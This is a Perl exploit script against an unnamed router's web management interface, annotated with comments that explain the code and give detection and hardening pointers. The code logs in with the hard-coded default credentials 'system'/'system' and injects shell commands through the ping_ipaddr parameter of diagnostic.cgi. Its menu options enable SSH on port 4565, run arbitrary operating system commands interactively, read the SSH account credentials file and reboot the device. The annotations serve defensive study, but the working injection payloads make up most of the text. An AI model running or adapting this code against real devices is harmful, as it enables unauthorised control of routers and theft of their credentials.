#!/usr/bin/perl
# Script against the web management interface of a router (the model is not
# named anywhere in this file).
#
# What the code below does:
#   1. Logs in to http://<router>/cgi-bin/login.cgi with the hard-coded
#      account "system"/"system".
#   2. Shows a four-item menu. Options 1-3 send a GET to
#      /cgi-bin/diagnostic.cgi in which the ping_ipaddr field holds an
#      address, an encoded ';' (%3B), a shell command, and an encoded '#'
#      (%23). Option 4 calls /cgi-bin/reboot.cgi.
#
# NOTE(review): the requests only make sense if diagnostic.cgi hands
# ping_ipaddr to a shell without validating it -- presumably the root cause;
# confirm against the firmware.
#
# Detection pointers taken from the requests below:
#   - GETs to /cgi-bin/diagnostic.cgi whose ping_ipaddr contains %3B / ';'
#     or other shell metacharacters;
#   - logins to /cgi-bin/login.cgi with login_id=system from unexpected hosts;
#   - /etc/sncfg/sshd.cfg containing SSHD_ENABLE=1 / SSHD_PORT=4565, or an SSH
#     listener on port 4565.
# Hardening: change or disable the "system" account, keep the management
# interface off untrusted networks, and run firmware that accepts only an IP
# address in ping_ipaddr (where the vendor provides one).
use strict;
use warnings;
use LWP::UserAgent;
use URI::Escape;
# Target address comes from the first command-line argument; the login
# account is hard-coded (presumably the device's built-in default account).
my ($RouterIP,$username,$password) = ($ARGV[0],"system","system");
# $RouterIP was just copied from $ARGV[0], so the two tests are equivalent:
# prompt for the address only when no argument was given.
unless ($ARGV[0] || $RouterIP) {
print "Enter router\'s IP Address: ";
chomp($RouterIP = <STDIN>);
}
# Indirect object syntax; equivalent to LWP::UserAgent->new.
my $ua = new LWP::UserAgent;
$ua->cookie_jar({}); # in-memory cookie jar; presumably carries the session cookie from login.cgi
# Login request. The credentials travel in the query string over plain HTTP,
# so they are exposed to proxies, access logs and anyone on the path.
# $RouterIP is interpolated into the URL without any validation.
# The literal is wrapped over several lines; the CR/LF characters are
# stripped right after it so the URL is sent as one line.
my $url = "http://$RouterIP/cgi-bin/login.cgi?
login_id=".uri_escape($username)."&login_pw=".uri_escape($password)."
&langSelection=english&action=Apply&time_sync=2015+3+16&
local_time=date+031621302015";
$url =~ s/\n//g;
$url =~ s/\r//g;
my $res = $ua->get($url); #Authentication
# is_success only reflects the HTTP status; nothing here checks that the
# device actually accepted the credentials before "Successfully Logged in!"
# is printed.
die "Failed to login: ".$res->status_line."\n" if (!$res->is_success);
print "Successfully Logged in!\n";
print q{Options to do:
1-UnFilter SSH Port (Router would be rebooted)
2-Run OS Commands throught web
3-See the ssh account credentials
4-Reboot
:};
# getc reads a single character as the menu choice.
chomp(my $opt = getc STDIN);
if (int($opt) == 1) {
# Option 1: the command placed after the encoded ';' rewrites
# /etc/sncfg/sshd.cfg with SSHD_ENABLE=1 and appends SSHD_PORT=4565.
# Those two values in that file are a host-side indicator that this ran.
$url = "http://$RouterIP/cgi-bin/diagnostic.cgi?select_mode_ping=on
&ping_ipaddr=0.0.0.0+-c+1%3B+
echo+SSHD_ENABLE%3D1+%3E%2Fetc%2Fsncfg%2Fsshd.cfg%3B
+echo+SSHD_PORT%3D4565+%3E%3E%2Fetc%2Fsncfg%2Fsshd.cfg
+%23&ping_count=4&trace_ipaddr=&trace_max_ttl=6&trace_qoeries_num=3&
trace_report_only_hidden=0&action=Apply&html_view=ping";
$url =~ s/\n//g;
$url =~ s/\r//g;
$res = $ua->get($url);
die "Failed: ".$res->status_line."\n" if (!$res->is_success);
print "UnFilter command sent. Please Reboot the router.\n";
}
elsif (int($opt) == 2) {
# Option 2: every line read from STDIN is URI-escaped and placed in the same
# position of ping_ipaddr; the response body is filtered and printed.
# chomp returns the number of characters it removed, so the loop keeps
# running while a newline-terminated line was read.
while (chomp(my $cmd = <STDIN>)) {
$url = "http://$RouterIP/cgi-bin/diagnostic.cgi?select_mode_ping=on
&ping_ipaddr=0.0.0.0+-c+1%3B+
".uri_escape($cmd)."
+%23&ping_count=4&trace_ipaddr=&trace_max_ttl=6&trace_qoeries_num=3&
trace_report_only_hidden=0&action=Apply&html_view=ping";
$url =~ s/\n//g;
$url =~ s/\r//g;
# This lexical $res shadows the outer one for the duration of the loop body.
my $res = $ua->get($url);
die "Failed: ".$res->status_line."\n" if (!$res->is_success);
# Response filtering: skip the first three lines of the body, then keep lines
# until one matching "Content-type: text/html" is seen. Presumably the command
# output sits between those points in the CGI's reply -- confirm on a device.
my @contents = split(/\n/,$res->content);
my $cres = "";
my $i = 1;
foreach (@contents) {
if (! /Content-type:\stext\/html/i) {
$cres .= $_."\n" if ($i > 3);
$i++;
}
else {
last;
}
}
# Print the collected text followed by a "$ " prompt for the next line.
print $cres."\$ ";
}
}
elsif (int($opt) == 3) {
# Option 3: same request shape; the command reads /etc/change_ssh_account,
# which the menu text describes as the SSH account credentials.
$url = "http://$RouterIP/cgi-bin/diagnostic.cgi?select_mode_ping=on
&ping_ipaddr=0.0.0.0+-c+1%3B+
cat%20%2fetc%2fchange_ssh_account
+%23&ping_count=4&trace_ipaddr=&trace_max_ttl=6&trace_qoeries_num=3&
trace_report_only_hidden=0&action=Apply&html_view=ping";
$url =~ s/\n//g;
$url =~ s/\r//g;
$res = $ua->get($url);
die "Failed: ".$res->status_line."\n" if (!$res->is_success);
# Same response filtering as option 2: drop three leading lines, stop at the
# first line matching "Content-type: text/html".
my @contents = split(/\n/,$res->content);
my $cres = "";
my $i = 1;
foreach (@contents) {
if (! /Content-type:\stext\/html/i) {
$cres .= $_."\n" if ($i > 3);
$i++;
}
else {
last;
}
}
print $cres;
}
elsif (int($opt) == 4) {
# Option 4: plain call to the reboot CGI with the default reboot option; no
# injected command is involved here.
$url = "http://$RouterIP/cgi-bin/reboot.cgi?
select_option_value=default_reboot&reboot_option=on&action=Apply";
$url =~ s/\n//g;
$url =~ s/\r//g;
$res = $ua->get($url);
die "Failed: ".$res->status_line."\n" if (!$res->is_success);
print "Reboot command sent.\n";
}
else {
# Any other input ends the script; a non-numeric character also makes int()
# emit a warning under "use warnings" before reaching this branch.
die "Bad option.\n";
}
exit 0;